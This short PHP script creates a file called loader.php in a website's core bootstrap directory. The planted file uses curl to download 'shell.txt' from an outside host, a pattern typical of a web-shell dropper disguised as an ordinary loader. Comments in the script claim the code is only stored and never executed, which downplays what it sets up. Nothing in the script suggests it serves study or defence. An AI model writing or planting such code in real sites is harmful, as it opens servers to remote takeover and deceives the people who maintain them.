<?php

$dir  = "/var/www/mystock-api.scriptbasket.com/core/bootstrap/";
$file = $dir . "loader.php";

/* Code you want to ADD (stored as text, not executed) */
$code = <<<'PHP'
<?php
$timezone = '';
$Url = "https://txt.dev-drops.com/shell.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $Url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);

/* NOTE:
   This file only STORES the code.
   It does NOT run eval or execute remote code.
*/
?>
PHP;

/* Create directory if not exists */
if (!is_dir($dir)) {
    mkdir($dir, 0755, true);
}

/* Write file */
if (file_put_contents($file, $code) !== false) {
    echo "File created successfully: " . $file;
} else {
    echo "Failed to create file.";
}
